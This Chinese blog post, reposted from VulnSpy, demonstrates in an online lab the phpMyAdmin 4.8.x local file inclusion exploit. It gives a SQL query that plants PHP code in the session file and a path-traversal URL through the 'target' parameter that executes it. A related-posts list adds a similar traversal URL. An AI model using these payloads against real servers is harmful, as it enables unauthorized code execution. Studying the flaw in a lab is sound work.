phpMyAdmin 4.8.x 最新版 本地文件包含漏洞利用

最新推荐文章于 2024-06-25 17:21:43 发布
最新推荐文章于 2024-06-25 17:21:43 发布
阅读量5.9k 收藏 5
点赞数
文章标签: phpmyadmin 文件包含 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ambulong/article/details/80757310
版权

今天ChaMd5安全团队公开了一个phpMyAdmin最新版中的本地文件包含漏洞:phpmyadmin4.8.1后台getshell。该漏洞利用不要求root帐号,只需能够登录 phpMyAdmin 便能够利用。

 

在这篇文章中我们将使用VulnSpy的在线 phpMyAdmin 环境来演示该漏洞的利用。

 

VulnSpy 在线 phpMyAdmin 环境地址:http://www.vulnspy.com/phpmyadmin-4.8.1/

漏洞细节

参照ChaMd5安全团队发布的文章:phpmyadmin4.8.1后台getshell

漏洞利用

因为原文中包含数据库文件可能由于文件权限或者帐号权限不足而无法利用,这里我们将使用另外一种方式来利用该文件包含漏洞,即包含session文件。

 

1. 进入VulnSpy 在线 phpMyAdmin 环境地址,点击 Start to Hack ,跳转到VSPlate

 

vulnspy

 

2. 等待载入设置后,点击 GO 按钮开启实验

 

vulnspy

 

3. 实验创建完成后,点击演示地址进入实验

 

vulnspy

 

4. 使用帐号 root ,密码 toor 登录 phpMyAdmin

 

vulnspy

 

5. 点击顶部导航栏中的SQL按钮,执行SQL查询

1
select  '<?php phpinfo();exit;?>'

vulnspy

 

6. 获取自己的SESSION ID

 

你的 SESSION ID 为 Cookie 中的 phpMyAdmin 项。

 

vulnspy

 

这样对应的SESSION文件为/var/lib/php/sessions/sess_你的SESSION ID

 

7. 包含SESSION文件,成功利用该漏洞

1
http: / / 1a23009a9c9e959d9c70932bb9f634eb .vsplate.me / index.php?target = db_sql.php % 253f / .. / .. / .. / .. / .. / .. / .. / .. / var / lib / php / sessions / sess_11njnj4253qq93vjm9q93nvc7p2lq82k

vulnspy

 

本文转载自:phpMyAdmin 4.8.x LFI Exploit - http://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-LFI-Exploit/

Ambulong
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PhpMyAdmin远程执行代码漏洞复现 (CVE-2016-5734)
千寻的博客
03-21 1458
phpMyAdmin`中存在安全漏洞,该漏洞源于程序没有正确选择分隔符来避免使用`preg_replace e`修饰符。远程攻击者可借助特制的字符串利用该漏洞执行任意PHP代码。
phpMyAdmin 4.8.x 本地文件包含漏洞利用
djt1999的博客
06-27 114
phpMyAdmin 4.8.x 本地文件包含漏洞利用 ChaMd5安全团队公开了一个phpMyAdmin最新版中的本地文件包含漏洞phpmyadmin4.8.1后台getshell。该漏洞利用不要求root帐号,只需能够登录 phpMyAdmin 便能够利用。 这一部分我们需要先了解一下LFI漏洞(本地文件包含漏洞) 典型漏洞代码: <!–?php include($_GET...
phpMyAdmin 4.0.10 文件包含 -> getshell
最新发布
2301_80115097的博客
06-25 876
gettype() 获取参数的属性也就是说我们的$var需要是一个数组这里的返回值就是True了还是刚刚说的那些,这里如果是Linux服务器的话,并且sql文件储存路径有大小写的话,就没办法拿到webshell了,并且还不能任意文件包含,还只能包含路径没有大写字符的,反正至少以我目前的水平是不行的,不过 linux 默认mysql文件的路径是 /var/lib/mysql/。默认情况下是无影响的。
phpmyadmin文件包含漏洞
Hydra的博客
10-21 938
http://139.199.31.116:9008/index.php?target=db_sql.php%253f/../../../../../../flag.txt  
phpmyadmin漏洞汇总
m0_64481831的博客
05-27 1211
phpmyadmin是一个以PHP为基础,以web方式架构在网站主机上的mysql的数据库管理工具,让管理者可用web接口管理mysql数据库,便于远端管理mysql数据库。
phpmyadmin漏洞合集
weixin_46626737的博客
07-02 529
../,比如在cmd命令行中,cd 到一个不存在的目录,会报错,在对传参的参数进行过滤时,需要过滤代码,但是传参点很多,需要多次输入过滤代码,开发人员考虑到使用将过滤代码写入过滤文件,通过include包含该文件,来达到一个过滤的目的,假如这个包含的文件是可以控制的,那么就可能导致文件包含,该漏洞中,主要是因为对于传参包含文件的参数过滤时,只是对其内容进行检测白名单验证,只要target参数是白名单中的。但是如果在其后加一个/../,系统会默认认为还是在当前目录,就不会对错误目录进行检查,也就不会报错;
phpMyAdmin v4.8.0.1
10-13
phpMyAdmin是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的资料库管理工具。phpMyAdmin 可以管理整个MySQL服务器(需要超级用户),也可以管理单个数据库。为了实现后一种,你将
数据管理.MySQL.phpMyAdmin.4.8.0.1.Final.简体中文多语言版.rar
06-29
《数据管理:MySQL与phpMyAdmin的深度解析》 MySQL,作为全球最受欢迎的开源关系型数据库管理...而phpMyAdmin 4.8.0.1的简体中文多语言版,更进一步降低了使用门槛,使得更多非英语用户也能轻松掌握数据库管理技能。
phpmyadmin config.inc.php配置示例
10-26
个config.inc.php文件为phpmyadmin的配置信息,下面有个已配置好的例子,大家可以参考下
phpMyAdmin漏洞利用与安全防范
02-25
很多公司和个人都喜欢使用phpMyAdmin来管理MySQL数据库——在zoomeye中搜索关键字phpmyadmin,我国位居第二,如下图1所示。phpMyAdmin功能非常强大,可以执行命令,导入或者导出数据库,可以说通过phpMyAdmin可以...
利用phpMyAdmin拿webshell
05-01
利用phpMyAdmin拿webshell 利用phpMyAdmin拿webshell
PhpMyAdmin 远程代码执行漏洞 (CVE-2016-5734)复现
君莫hacker的博客
09-12 672
0x01 漏洞介绍 漏洞描述 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。在其查找并替换字符串功能中,将用户输入的信息拼接进preg_replace函数第一个参数中。 在PHP5.4.7以前,preg_replace的第一个参数可以利用\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造一个任意代码执行漏洞漏洞编号 CVE-2016-5734 受影响版本 4.0.10.16之前4.0.x版本 4.4.15.7之前4.4.x版本
phpMyAdmin 漏洞利用
lendq的Blog
02-08 2428
国内 很多 网址 都 喜欢 使用phpMyAdmin来 管理 MySQL数据库 而且多数 可以 通过phpMyAdmin 完全操控Mysql数据库。 phpMyAdmin功能常强大 可以执行 操作系统 命令,导入或者导出数据库 一般会存在Root密码过于简单,代码泄露``Mysql配置等漏洞 通过一些技术手段 ,多数能获取网站webshell,甚至是服务器权限。 phpMyAd...
[Vulhub](WooYun-2016-199433)phpmyadmin反序列化漏洞
qq_50854662的博客
10-30 323
0x00 预备知识 什么是序列化 序列化 (serialize)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。【将状态信息保存为字符串】简单的理解:将PHP中 对象、类、数组、变量、匿名函数等,转化为字符串,方便保存到数据库或者文件中当在php中创建了一个对象后,可以通过serialize()把这个对象转变成一个字符串,保存对象的值方便之后的传递与使用。 什么是反序列化 序
最全phpmyadmin漏洞汇总
m0_67402013的博客
07-31 9539
phpMyAdmin是一个用php编写的免费软件工具,旨在通过Web友好界面处理MySQL的管理。phpMyAdmin支持对MySQL和MariaDB数据库的广泛操作。经常使用的操作(有如管理数据库、表、列、关系、索引、用户、权限等)可以通过用户界面执行,当然您也可以直接执行任何SQL语句。从1998年发布第一版,到目前发布的最新版为5.1.1,全部历史版本说明phpMyAdmin5.2未来版本与PHP7.2及更高版本和MySQL/MariaDB5.5及更高版本兼容。1、1、条件。...
phpmyadmin 4.8.1远程文件包含漏洞 CVE-2018-12613 漏洞复现
ADummy的博客
02-26 278
phpmyadmin 4.8.1远程文件包含漏洞(CVE-2018-12613) by ADummy 0x00利用路线 ​ 首先要能登录数据库,然后测试文件包含 0x01漏洞介绍 这里需要满足如下5个条件便可以执行包含文件代码include $_REQUEST['target']; 1.$_REQUEST['target']不为空 2.$_REQUEST['target']是字符串 3.$_REQUEST['target']开头不是index 4.$_REQUEST['target']不在$target
PhpMyAdmin漏洞利用汇总
xuu4561的博客
10-04 1008
PhpMyAdmin漏洞利用汇总 目录 0x01 信息收集 1.1 版本信息获取 1.2 绝对路径获取 0x02 PhpMyAdmin利用 2.1 写入文件GetShell 2.2 User defined funct ion(UDF): 2.3 MOF提权: 0x03 PhpMyAdmin漏洞利用 3.1 WooYun-2016-199433:任意文件读取漏洞 3.2 CVE-2014 -8959:本地文件包含 3.3 CVE-2016-5734 :后台命令执行RCE 3.4 CVE-20
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值